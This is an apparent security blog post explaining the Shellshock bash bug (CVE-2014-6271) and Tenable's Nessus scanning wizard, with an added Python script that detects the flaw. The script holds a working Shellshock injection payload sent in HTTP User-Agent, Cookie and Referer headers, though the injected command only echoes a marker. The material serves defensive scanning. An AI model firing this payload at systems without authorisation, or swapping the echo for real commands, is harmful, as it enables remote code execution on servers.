Shellshock Vulnerability Scanning – Nessus

Nessus is one of the most popular vulnerability scanners: it scans an IT infrastructure to find the vulnerabilities present in the network. Nessus can also be integrated with Nmap and Metasploit; the combination gives you vulnerability scanning plus exploitation, a complete penetration testing environment. OpenVAS is the main competitor of Nessus, and both tools have their own merits and demerits, but this time the objective is to make Unix/Mac systems secure from "Shellshock".

What Is the Shellshock Bug?

Shellshock is a vulnerability that many consider bigger than the Heartbleed bug; it affects Linux and Mac OS X systems. Dubbed Shellshock, or the Bash Bug, the vulnerability is officially known as CVE-2014-6271 and sits in the Bash command processor, which ships in most Linux distributions and in Apple's Mac OS X. Bash itself is the flawed component: it executes code appended to a function definition imported from an environment variable. Any software that passes attacker-controlled input to bash through the environment is therefore exposed, and the Apache web server is the prime example, because CGI scripts receive request headers such as User-Agent as environment variables.
Users running Linux and Mac OS X on their PCs are at risk, but the most likely targets are web servers running Apache with CGI enabled.

How to scan for the "Shellshock" vulnerability?


Shellshock is in bash, but it can be exploited remotely in a number of ways (via HTTP or other means). Tenable has released a handful of plugins to do patch checks, to test for the vulnerability over SSH in an authenticated scan, and to test for the vulnerability over HTTP(S). To speed up the audit, Tenable also released a wizard for this.
To use it, update your plugin feed (make sure you are running plugin set 201409251325 or newer). Then go to Policies -> Create a new policy, and you will notice the new Shellshock wizard:

Click on it and follow the instructions. You will have the option to enter your SSH credentials, but you can just as well perform a fully unauthenticated scan that only targets HTTP. Keep in mind what that trade-off means: the unauthenticated scan only finds hosts that expose bash through a web server, so a host with a vulnerable bash and no such exposure will only be caught when you supply credentials. Once the policy is set, create a new scan and use it. With luck, the scan will come back with no Shellshock findings.


What does this wizard do?


This wizard creates a very narrow scan policy that performs a quick port scan (or a slower one, if you ask for a "thorough" scan) to identify the remote HTTP and SSH servers. Then it will:
  • Log into every host (if you provided credentials) and make sure that the vendor-supplied patches are installed;
  • For good measure, use the opportunity of being logged in to check bash itself directly, so that if your vendor did not provide patches, or if you are scanning an unsupported system, Nessus will still catch the flaw;
  • If a web server is running, crawl it while setting a malformed User-Agent, Cookie and Referer header to try to exploit the vulnerability through this attack vector.
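To make the two checks above concrete, here is an added example (not Tenable's code and not part of the original post) that reproduces both in miniature: a local bash check of the kind the authenticated scan performs, and an HTTP probe that places the Shellshock payload in the User-Agent, Cookie and Referer headers, the way the crawl does. The probe is non-destructive: the injected command only echoes a random marker, and the echoed Content-Type line plus blank line are there so the CGI output is a valid HTTP response and the marker lands in the body. The URL passed to probe_url is the tester's choice; any function and marker names here are this example's own.

```python
"""Added example: minimal Shellshock (CVE-2014-6271) checks modelled on the
Nessus plugins described above. Illustrative code, not Tenable's."""
import secrets
import subprocess
import urllib.error
import urllib.request


def shellshock_payload(marker: str) -> str:
    """Bash function-definition injection. A vulnerable bash runs the text
    after the function body when it imports any environment variable whose
    value starts with "() {". The echoed header and blank line keep the CGI
    output a valid HTTP response so the marker appears in the body."""
    return f"() {{ :;}}; echo Content-Type: text/plain; echo; echo {marker}"


def build_probe_headers(marker: str) -> dict:
    """Same payload in the three headers the Nessus crawl malforms. A CGI
    script sees them as HTTP_USER_AGENT, HTTP_COOKIE and HTTP_REFERER."""
    payload = shellshock_payload(marker)
    return {"User-Agent": payload, "Cookie": payload, "Referer": payload}


def response_indicates_vulnerable(body: bytes, marker: str) -> bool:
    """Only an executed payload can put the random marker into the body."""
    return marker.encode() in body


def probe_url(url: str, timeout: float = 10.0) -> bool:
    """Send one probe request (HTTP vector). Only test hosts you are
    authorised to scan. Returns True if the marker came back."""
    marker = "ss-" + secrets.token_hex(8)  # fresh marker per probe
    req = urllib.request.Request(url, headers=build_probe_headers(marker))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read()
    except urllib.error.HTTPError as err:
        body = err.read()  # a 500 may still carry the marker
    return response_indicates_vulnerable(body, marker)


def check_local_bash(bash: str = "bash"):
    """Local check of bash itself (what the authenticated scan does after
    the patch check). Returns True if vulnerable, False if patched, None if
    no bash binary is found. The variable name "x" is arbitrary."""
    marker = "ss-" + secrets.token_hex(8)
    env = {"PATH": "/usr/bin:/bin", "x": f"() {{ :;}}; echo {marker}"}
    try:
        out = subprocess.run([bash, "-c", "echo probe"], env=env,
                             capture_output=True, text=True, timeout=10)
    except FileNotFoundError:
        return None
    return marker in out.stdout


if __name__ == "__main__":
    print("local bash vulnerable:", check_local_bash())
    # Constructed sample response standing in for a real CGI reply:
    sample = b"Content-Type: text/plain\r\n\r\nss-deadbeef\r\n"
    print("sample body vulnerable:", response_indicates_vulnerable(sample, "ss-deadbeef"))
```

Two caveats a practitioner will want: the HTTP probe only finds hosts that expose bash through a web server (a CGI script written in bash, or one that shells out), so a clean HTTP result says nothing about hosts that are vulnerable but not exposed that way, which is exactly why the wizard offers the credentialed patch and bash checks. And a 500 response must still be inspected, because the injected output can break the CGI protocol while still carrying the marker.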

Source: Tenable (the scanning instructions above are taken from Tenable's announcement of the Shellshock wizard).

Ehacking Staff
